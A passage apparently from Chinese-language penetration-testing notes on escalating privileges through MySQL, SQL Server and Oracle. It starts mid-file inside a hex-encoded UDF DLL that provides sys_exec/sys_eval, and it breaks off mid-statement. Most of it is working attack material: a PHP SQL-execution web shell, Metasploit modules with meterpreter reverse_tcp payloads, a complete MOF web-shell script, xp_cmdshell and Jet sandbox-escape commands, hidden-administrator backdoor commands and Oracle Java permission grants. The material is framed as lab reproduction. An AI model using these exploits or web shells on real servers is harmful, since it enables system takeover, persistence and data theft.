B2D0000E8D60400003BC774114D8BC4BA02000000498BCDFF15012D0000FF054B270000B801000000488B5C2440488B6C2448488B7C24504C8B6424584883C420415F415E415DC3CCCCCC488BC448895808488970104889781841544883EC30498BF08BFA4C8BE1BB010000008958E88915E926000085D275123915EF260000750A33DB8958E8E9CA00000083FA01740583FA027533488B054A1800004885C07408FFD08BD88944242085DB74134C8BC68BD7498BCCE834FDFFFF8BD88944242085DB0F848D0000004C8BC68BD7498BCCE8690400008BD88944242083FF01753585C075314C8BC633D2498BCCE84D0400004C8BC633D2498BCCE8F0FCFFFF4C8B1DE11700004D85DB740B4C8BC633D2498BCC41FFD385FF740583FF0375374C8BC68BD7498BCCE8C3FCFFFFF7D81BC923CB8BD9894C2420741C488B05A61700004885C074104C8BC68BD7498BCCFFD08BD889442420EB0633DB895C2420C705F7250000FFFFFFFF8BC3488B5C2440488B742448488B7C24504883C430415CC3CCCCCC48895C24084889742410574883EC20498BF88BDA488BF183FA017505E8BF0300004C8BC78BD3488BCE488B5C2430488B7424384883C4205FE98BFEFFFFCCCCCC48894C24084881EC88000000488D0D49260000FF15BB1500004C8B1D342700004C895C24584533C0488D542460488B4C2458E841040000488944245048837C245000744148C744243800000000488D4424484889442430488D4424404889442428488D05F425000048894424204C8B4C24504C8B442458488B54246033C9E8EF030000EB22488B842488000000488905C0260000488D8424880000004883C0084889054D260000488B05A626000048890517250000488B84249000000048890518260000C705EE240000090400C0C705E824000001000000488B05AD2400004889442468488B05A92400004889442470FF15F6140000890558250000B901000000E84E03000033C9FF15E6140000488D0D17160000FF15E1140000833D3225000000750AB901000000E826030000FF15D0140000BA090400C0488BC8FF15CA1400004881C488000000C3CCCC488D0DD9290000E90203000040534883EC20488BD9488B0DEC290000FF15CE14000048894424384883F8FF750B488BCBFF15EA140000EB7EB908000000E8DE02000090488B0DBE290000FF15A01400004889442438488B0DA4290000FF158E1400004889442440488BCBFF15D8140000488BC84C8D442440488D542438E898020000488BD8488B4C2438FF15B814000048890571290000488B4C2440FF15A614000048890557290000B908000000E861020000488BC34883C4205BC34883EC28E847FFFFFF48F7D81BC0F7D8FFC84883C428C3CC48895C2408574883EC20488D1D03160000488D3DFC150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC348895C2408574883EC20488D1DDB150000488D3DD4150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC3CCCCCCCCCCCCCCCCCCCCCCCC488BC1B94D5A0000663908740333C0C34863483C4803C833C0813950450000750CBA0B020000663951180F94C0F3C3CC4C63413C4533C94C8BD24C03C1410FB74014450FB758064A8D4C00184585DB741E8B510C4C3BD2720A8B410803C24C3BD0720F41FFC14883C128453BCB72E233C0C3488BC1C3CCCCCCCCCCCCCCCCCCCC4883EC284C8BC14C8D0D62E2FFFF498BC9E86AFFFFFF85C074224D2BC1498BD0498BC9E888FFFFFF4885C0740F8B4024C1E81FF7D083E001EB0233C04883C428C3CCFF2520130000FF2512130000FF25BC120000FF25BE120000FF25681300004883EC2883FA01751048833D97130000007506FF1537120000B8010000004883C428C3CC48895C2418574883EC20488B05DB21000048836424300048BF32A2DF2D992B0000483BC7740C48F7D0488905C4210000EB76488D4C2430FF153F120000488B5C2430FF15C4110000448BD84933DBFF15C0110000448BD84933DBFF15BC110000488D4C2438448BD84933DBFF15B31100004C8B5C24384C33DB48B8FFFFFFFFFFFF00004C23D848B833A2DF2D992B00004C3BDF4C0F44D84C891D4E21000049F7D34C891D4C210000488B5C24404883C4205FC3CCFF25EA110000FF25EC110000FF25EE110000FF25F0110000FF25F2110000FF256C110000FF255E110000CCCC40534883EC20458B18488BDA4C8BC94183E3F841F600044C8BD17413418B40084D635004F7D84C03D14863C84C23D14963C34A8B1410488B43108B480848034B08F641030F740C0FB6410383E0F048984C03C84C33CA498BC94883C4205BE9C9F6FFFFCC4883EC284D8B4138488BCA498BD1E889FFFFFFB8010000004883C428C3CCFF25E4110000CCCCCCCC40554883EC20488BEA488BD148894D28488B018B08894D24E84DFEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEAC7054D200000FFFFFFFF4883C4205DC340554883EC20488BEAB908000000E8F8FEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEA488B0133C98138050000C00F94C18BC18BC14883C4205DC3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F43800000000000000000000000000000000000000000000000000000000000000000000000000004016008001000000000000000000000000000000000000003040008001000000D0400080010000004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279000000720000000000000000000000000000000000000000000000000000000000000000000000011D0C001DC40B001D740A001D5409001D3408001D3219F017E015D01915080015740A001564090015340800155211C0E41D00000200000027190000091A0000801F0000091A0000211900000F1A0000B01F000000000000010F06000F6407000F3406000F320B70010C02000C01110001060200063202501106020006320230E41D000001000000031C0000691C0000C91F0000000000000904010004420000E41D000001000000971D0000CA1D0000F01F0000CA1D00000104010004420000010A04000A3408000A3206700904010004420000E41D000001000000E4150000EB15000001000000EB150000010F06000F640A000F3408000F520B7021000000E01300000F14000004340000210000000F14000058140000F03300002108020008348C000F14000058140000F03300002108020008548E00E01300000F14000004340000192207001001860009E007D005C0037002600000581F000020040000010A04000A3406000A32067001310400317406000632023001060200063202308034000000000000000000004036000000300000203500000000000000000000A4360000A0300000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F4380000000000000000000000000000680457616974466F7253696E676C654F626A6563740058045669727475616C416C6C6F630000D503536574456E7669726F6E6D656E745661726961626C654100A30043726561746554687265616400004B45524E454C33322E646C6C0000AC04667265650000E7025F70636C6F736500E5046D616C6C6F630000EB025F706F70656E00003B0573797374656D00002B057374726E637079009B0466676574730006057265616C6C6F6300BC04676574656E7600004D5356435239302E646C6C0037015F656E636F64655F706F696E746572004E025F6D616C6C6F635F63727400CE015F696E69747465726D00CF015F696E69747465726D5F650038015F656E636F6465645F6E756C6C002D015F6465636F64655F706F696E74657200E2005F616D73675F65786974000059005F5F435F73706563696669635F68616E646C657200005A005F5F4370705863707446696C7465720083005F5F6372745F64656275676765725F686F6F6B007B005F5F636C65616E5F747970655F696E666F5F6E616D65735F696E7465726E616C0000A4035F756E6C6F636B0085005F5F646C6C6F6E65786974003D025F6C6F636B00E4025F6F6E65786974002504536C6565700031045465726D696E61746550726F636573730000AA0147657443757272656E7450726F63657373004204556E68616E646C6564457863657074696F6E46696C74657200001904536574556E68616E646C6564457863657074696F6E46696C74657200CB024973446562756767657250726573656E7400970352746C5669727475616C556E77696E640000900352746C4C6F6F6B757046756E6374696F6E456E7472790000890352746C43617074757265436F6E7465787400CC0044697361626C655468726561644C69627261727943616C6C73004E035175657279506572666F726D616E6365436F756E7465720066024765745469636B436F756E740000AE0147657443757272656E7454687265616449640000AB0147657443757272656E7450726F636573734964004F0247657453797374656D54696D65417346696C6554696D6500F0046D656D637079000000000000000070B1834B00000000DC3900000100000012000000120000002839000070390000B8390000601000003015000000100000401500003015000020150000E01300003015000050130000C013000030150000501300002011000030150000B0100000D0120000B012000080110000F1390000073A0000243A00003F3A00004B3A00005E3A00006F3A0000783A0000883A0000963A00009F3A0000AF3A0000BD3A0000C53A0000D43A0000E13A0000E93A0000F83A000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E697400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000032A2DF2D992B0000CD5D20D266D4FFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020110000721100002C34000080110000AC12000020340000B0120000C812000078330000D01200004E13000018330000C0130000D813000078330000E01300000F140000043400000F14000058140000F033000058140000BE140000DC330000BE140000D4140000CC330000D41400001B150000BC33000040150000D7150000AC330000E0150000F21500008C330000401600009E16000038340000A0160000F9180000C0320000FC180000311A0000DC320000341A0000711A000018330000741A0000BE1B000028330000CC1B00007C1C0000383300007C1C0000931C000078330000941C0000CC1C000020340000CC1C0000041D000020340000901D0000D11D000058330000F01D0000131E000078330000141E0000C71E000080330000F41E0000571F000038340000581F0000751F000078330000801F0000A31F000030330000B01F0000C91F000030330000C91F0000E21F000030330000F01F0000112000003033000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005860000058020000E4040000000000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F726571756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F3E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564339302E435254222076657273696F6E3D22392E302E32313032322E38222070726F636573736F724172636869746563747572653D22616D64363422207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E47003000001000000088A1A0A1A8A1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
          
          
           }
          
          
          
          
           ?>
          
        2. 以下是要过本地限制连接mysql数据库显示并执行的php代码:

          <?php
          $host = 'localhost';
          $username = 'root';
          $password = '123456'; // 注意:出于安全考虑,避免在代码中明文存储密码
          $conn = new mysqli($host, $username, $password);
          
          if ($conn->connect_error) {
              die("连接失败: " . $conn->connect_error);
          }
          $conn->set_charset("utf8mb4");
          
          $response = [];
          
          if ($_SERVER["REQUEST_METHOD"] === "POST") {
              $action = $_POST['action'];
              $database = $_POST['database'];
              if ($database) {
                  $conn->select_db($database);
              }
          
              switch ($action) {
                  case 'getTables':
                      $sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = '$database'";
                      $result = $conn->query($sql);
                      while ($row = $result->fetch_assoc()) {
                          $response[] = $row['table_name'];
                      }
                      break;
                  case 'getColumns':
                      $table = $_POST['table'];
                      $sql = "SELECT column_name FROM information_schema.columns WHERE table_schema = '$database' AND table_name = '$table'";
                      $result = $conn->query($sql);
                      while ($row = $result->fetch_assoc()) {
                          $response[] = $row['column_name'];
                      }
                      break;
                  case 'getRows':
                      $table = $_POST['table'];
                      $column = $_POST['column'];
                      $sql = "SELECT `$column` FROM `$table`";
                      $result = $conn->query($sql);
                      while ($row = $result->fetch_assoc()) {
                          $response[] = $row[$column];
                      }
                      break;
                  case 'executeSQL':
                      $sql = $_POST['sql'];
                      $result = $conn->query($sql);
                      if ($result === true) {
                          $response['success'] = "执行成功";
                      } else if ($result) {
                          while ($row = $result->fetch_assoc()) {
                              $response[] = $row;
                          }
                      } else {
                          $response['error'] = "错误: " . $conn->error;
                      }
                      break;
              }
          
              $conn->close();
              echo json_encode($response);
              exit;
          }
          
          $databases = [];
          $result = $conn->query("SHOW DATABASES");
          while ($row = $result->fetch_assoc()) {
              $databases[] = $row['Database'];
          }
          $conn->close();
          ?>
          <!DOCTYPE html>
          <html lang="zh-CN">
          <head>
          <meta charset="UTF-8">
          <title>CongSec</title>
          <style>
              body { font-family: Arial, sans-serif; }
              .container {
                  display: flex;
                  flex-wrap: wrap;  /* 允许子项在必要时换行 */
                  align-items: center; /* 中心对齐子项 */
                  padding: 10px;
              }
              button {
                  margin: 5px;
                  padding: 8px 16px;
                  background-color: #4CAF50;
                  color: white;
                  border: none;
                  border-radius: 4px;
                  cursor: pointer;
                  min-width: 120px; /* 最小宽度 */
                  white-space: nowrap; /* 防止文字在按钮内换行 */
              }
              button:hover {
                  background-color: #45a049;
              }
              div {
                  margin: 5px;
              }
              textarea {
                  width: 95%; /* 调整宽度以适应屏幕 */
                  height: 150px; /* 调整高度 */
                  margin: 5px;
              }
          </style>
          <script>
          function fetchTables(database) {
              fetch('', {
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/x-www-form-urlencoded',
                  },
                  body: 'action=getTables&database=' + encodeURIComponent(database)
              })
              .then(response => response.json())
              .then(data => {
                  const container = document.getElementById('tables');
                  container.innerHTML = '';
                  data.forEach(table => {
                      const div = document.createElement('div');
                      const button = document.createElement('button');
                      button.textContent = table;
                      button.onclick = () => fetchColumns(database, table);
                      div.appendChild(button);
                      container.appendChild(div);
                  });
              });
          }
          
          function fetchColumns(database, table) {
              fetch('', {
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/x-www-form-urlencoded',
                  },
                  body: 'action=getColumns&database=' + encodeURIComponent(database) + '&table=' + encodeURIComponent(table)
              })
              .then(response => response.json())
              .then(data => {
                  const container = document.getElementById('columns');
                  container.innerHTML = '';
                  data.forEach(column => {
                      const div = document.createElement('div');
                      const button = document.createElement('button');
                      button.textContent = column;
                      button.onclick = () => fetchRows(database, table, column);
                      div.appendChild(button);
                      container.appendChild(div);
                  });
              });
          }
          
          function fetchRows(database, table, column) {
              fetch('', {
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/x-www-form-urlencoded',
                  },
                  body: 'action=getRows&database=' + encodeURIComponent(database) + '&table=' + encodeURIComponent(table) + '&column=' + encodeURIComponent(column)
              })
              .then(response => response.json())
              .then(data => {
                  const container = document.getElementById('rows');
                  container.innerHTML = '';
                  data.forEach(value => {
                      const div = document.createElement('div');
                      div.textContent = value;
                      container.appendChild(div);
                  });
              });
          }
          
          function executeSQL() {
              const sql = document.getElementById('sqlText').value;
              fetch('', {
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/x-www-form-urlencoded',
                  },
                  body: 'action=executeSQL&sql=' + encodeURIComponent(sql)
              })
              .then(response => response.json())
              .then(data => {
                  const container = document.getElementById('sqlResult');
                  container.innerHTML = '';
                  if (data.error) {
                      container.textContent = data.error;
                  } else if (data.success) {
                      container.textContent = data.success;
                  } else {
                      data.forEach(row => {
                          const div = document.createElement('div');
                          div.textContent = JSON.stringify(row);
                          container.appendChild(div);
                      });
                  }
              });
          }
          </script>
          </head>
          <body>
          <h1>选择数据库</h1>
          <div class="container" id="databases">
          <?php foreach ($databases as $db): ?>
              <button onclick="fetchTables('<?php echo $db; ?>')"><?php echo $db; ?></button>
          <?php endforeach; ?>
          </div>
          <h2>表信息</h2>
          <div class="container" id="tables"></div>
          <h2>列信息</h2>
          <div class="container" id="columns"></div>
          <h2>字段信息</h2>
          <div class="container" id="rows"></div>
          <h2>执行SQL</h2>
          <div class="container" id="executeSQL">
              <textarea id="sqlText"></textarea>
              <button onclick="executeSQL()">执行</button>
          </div>
          <h2>SQL执行结果</h2>
          <div class="container" id="sqlResult"></div>
          </body>
          </html>
          
        3. 访问该脚本,输入数据库的账号和密码

          1. image
        4. 点击导出可以在目标主机的脚本提示目录中发现有udf.dll文件生成

          1. image
          2. image
        5. 将dll文件绑定sys_eval函数

          1. image
        6. 使用select cmdshell('whoami')命令可以看到是系统管理员身份

          1. image
      2. 只有数据库权限

        1. 条件
          1. 数据库外联开启

          2. secure-file-priv没进行目录限制

            1. image
          3. 具有数据库帐号密码

        2. 复现
          1. 靶场:php 5.4.45 apche 2.4.23 iis win2008 mysql 5.5.53

          2. 首先我们要创建一个模拟可以外联的sql数据库来模拟攻击者已经获取了一个普通用户的数据库,以下是开启外联的步骤

            1. 在mysql数据库中主机为%即为容许所有主机来连接

              1. image

              2. 成功连接

                1. image
          3. msf工具
            1. udf生成的文件路径:

              1. mysql5.2导出目录c:/windows或system32

              2. mysql=5.2导出安装目录/lib/plugin/

                1. image
              3. 安装目录

                1. image
            2. 通过msf工具生成eqoWcBgh.dll文件

              1.  use exploit/multi/mysql/mysql_udf_payload
                 set payload windows/meterpreter/reverse_tcp 
                 set password root
                 set  rhosts 192.168.72.139
                 run
                
              2. image
            3. 创建函数绑定dll

              1. image
            4. 可以执行任意命令,拿下webshell

              1. image
            5. 利用msf执行以下命令来创建启动项开机自启后门

              1.  use exploit/windows/mysql/mysql_start_up 
                 set rhosts 192.168.72.139
                 set username root
                 set password root 
                 run
                
              2. image
          4. sql语句提权
            1. 在数据库中执行一下脚本即可拿到system权限

              1. image
    2. MOF提权

      1. 前言
        1. mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。【MOF提权只能用于Windows系统提权,Linux提权无法使用】
        2. xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。
      2. 条件
        1. mysql有读写 C:/Windows/system32/wbem/mof 的权限
        2. secure-file-priv参数不为null
        3. 适用于win2003更早的版本
      3. 复现
        1. msf工具
          1. 使用msf工具来提权即可

            1.  use exploit/windows/mysql/mysql_mof
              
               # 设置payload
               set payload windows/meterpreter/reverse_tcp
              
               # 设置目标 MySQL 的基础信息
               set rhosts 192.168.72.139
               set username root
               set password root
               run
              
        2. php脚本提权
          1. 将脚本通过文件上传到可访问路径并用数据库账号和密码进行连接即可

            1. image

            2. 提权脚本:

              1.  <?php 
                 $path="c:/ini.txt"; 
                 session_start(); 
                 if(!empty($_POST['submit'])){ 
                 setcookie("connect"); 
                 setcookie("connect[host]",$_POST['host']); 
                 setcookie("connect[user]",$_POST['user']); 
                 setcookie("connect[pass]",$_POST['pass']); 
                 setcookie("connect[dbname]",$_POST['dbname']); 
                 echo "<script>location.href='?action=connect'</script>"; 
                 } 
                 if(empty($_GET["action"])){ 
                 ?> 
                
                 <html> 
                 <head><title>Win MOF Shell</title></head> 
                 <body> 
                 <form action="?action=connect" method="post"> 
                 Host: 
                 <input type="text" name="host" value="127.0.0.1"><br/> 
                 User: 
                 <input type="text" name="user" value="root"><br/> 
                 Pass: 
                 <input type="password" name="pass" value="root"><br/> 
                 DB:   
                 <input type="text" name="dbname" value="mysql"><br/> 
                 <input type="submit" name="submit" value="Submit"><br/> 
                 </form> 
                 </body> 
                 </html> 
                
                 <?php 
                 exit; 
                 } 
                 if ($_GET[action]=='connect') 
                 { 
                 $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); 
                 echo "<form action='' method='post'>"; 
                 echo "Cmd:"; 
                 echo "<input type='text' name='cmd' value='$strCmd'?>"; 
                 echo "<br>"; 
                 echo "<br>"; 
                 echo "<input type='submit' value='Exploit'>"; 
                 echo "</form>"; 
                 echo "<form action='' method='post'>"; 
                 echo "<input type='hidden' name='flag' value='flag'>"; 
                 echo "<input type='submit'value=' Read  '>"; 
                 echo "</form>"; 
                 if (isset($_POST['cmd'])){ 
                 $strCmd=$_POST['cmd']; 
                 $cmdshell='cmd /c '.$strCmd.'>'.$path; 
                 $mofname="c:/windows/system32/wbem/mof/system.mof"; 
                 $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\") 
                
                 instance of __EventFilter as \$EventFilter 
                 { 
                   EventNamespace = \"Root\\\\\\\\Cimv2\"; 
                   Name  = \"filtP2\"; 
                   Query = \"Select * From __InstanceModificationEvent \" 
                       \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \" 
                       \"And TargetInstance.Second = 5\"; 
                   QueryLanguage = \"WQL\"; 
                 }; 
                
                 instance of ActiveScriptEventConsumer as \$Consumer 
                 { 
                   Name = \"consPCSV2\"; 
                   ScriptingEngine = \"JScript\"; 
                   ScriptText = 
                   \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; 
                 }; 
                
                 instance of __FilterToConsumerBinding 
                 { 
                   Consumer = \$Consumer; 
                   Filter = \$EventFilter; 
                 };"; 
                 mysql_select_db($_COOKIE["connect"]["dbname"],$conn); 
                 $sql1="select '$payload' into dumpfile '$mofname';"; 
                 if(mysql_query($sql1)) 
                   echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); 
                 mysql_close($conn); 
                 } 
                
                 if(isset($_POST['flag'])) 
                 { 
                   $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); 
                   $sql2="select load_file(\"".$path."\");"; 
                   $result2=mysql_query($sql2); 
                   $num=mysql_num_rows($result2); 
                   while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { 
                     echo "<hr/>"; 
                     echo '<pre>'. $row[0].'</pre>'; 
                   } 
                   mysql_close($conn); 
                 } 
                 } 
                 ?>
                
          2. 连接上即可执行任意命令

            1. image
          3. 接下来就进行权限的维持

            1. 创建隐藏用户net user cong$ 12456 /add & net localgroup administrators cong$ /add
            2. image
    3. sqlserver提权

      1. 前言

        1. 在SQL Server中,如果攻击者能够获取到sa(系统管理员)账户的密码,那么他们实际上已经拥有了非常高的权限,因为sa账户是SQL Server中的超级用户,具有对数据库服务器的完全控制权。

        2. 关于执行操作系统命令的权限,特别是通过SQL Server的 xp_cmdshell或其他机制,这取决于SQL Server的配置以及运行SQL Server的 Windows操作系统账户的安全设置。

        3. 敏感文件名称

          1.  web.config 
             config.asp 
             conn.aspx 
             database.aspx
            
      2. 条件

        1. 服务器开启数据库服务
        2. 获取到最高权限用户密码
          (除Access数据库外,其他数据库基本都存在数据库提权的可能)
      3. xp_cmdshell提权

        1. 复现
          1. 通过连接数据库执行数据库语句

            1. 开启xp_cmdshell命令

              1.  EXEC sp_configure 'show advanced options', 1
                 RECONFIGURE;
                 EXEC sp_configure 'xp_cmdshell', 1;
                 RECONFIGURE;
                
            2. 执行命令语句EXEC master.dbo.xp_cmdshell 'whoami'即可

      4. 沙盒提权

        1. 介绍
          1. 沙盒模式是数据库的一种安全功能。在沙盒模式下,只对控件和字段属性中的安全且不含恶意代码的表达式求值。如果表达式不使用可能以某种方式损坏数据的函数或属性,则可认为它是安全的。利用前提需要sqlserver sysadmin账户服务器权限为system(sqlserver2019默认被降权为mssql),服务器拥有 jet.oledb.4.0 驱动。

          2. 局限:(1)Microsoft.jet.oledb.4.0一般在32位操作系统上才可以 (2)Windows 2008以上 默认无 Access 数据库文件, 需要自己上传 sqlserver2015默认禁用Ad Hoc Distributed Queries,需要开启。

          3. 沙盒模式SandBoxMode参数含义(默认是2)

            0:在任何所有者中禁止启用安全模式

            1 :为仅在允许范围内

            2 :必须在access模式下

            3:完全开启

        2. 复现
          1. 执行以下两条命令,启用高级选项

            1.  exec sp_configure 'show advanced options',1;reconfigure;
               exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
              
          2. 修改注册表

            1. exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
          3. 使用 SQL Server 的扩展存储过程 xp_regread 来从 Windows 注册表中读取 SandBoxMode 键的值。

            1. exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode';
          4. 执行系统命令

            1.  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user qianxun 123456 /add")')
               select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators qianxun /add")')
              
          5. 恢复配置

            1.  exec master..xp_regwrite 'HKEY_LOCALMACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;
               exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;
               exec sp_configure 'show advanced options',0;reconfigure;
              

Oracle提权

  1. 靶场搭建

    1. 准备一个oracle环境的靶场

    2. 进入数据库sqlplus/nolog

    3. 连接数据库用户conn/as sysdba

    4. 创建一个低权限用户create user test identified by test;

      1. image
    5. 还有获得有java权限

      1.  DECLARE
        
             POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
        
             CURSOR C1 IS SELECT 'GRANT', 'ZTZ', 'SYS', 'java.io.FilePermission', '<<ALL
        
          FILES>>', 'execute', 'ENABLED' FROM DUAL;
        
             BEGIN
        
             OPEN C1;
        
             FETCH C1 BULK COLLECT INTO POL;
        
             CLOSE C1;
        
             DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
        
             END;
        
            /
        
    6. 如果想要执行任意代码的话还需要额外获得java.lang.RuntimePermission权限

      1.  DECLARE
        
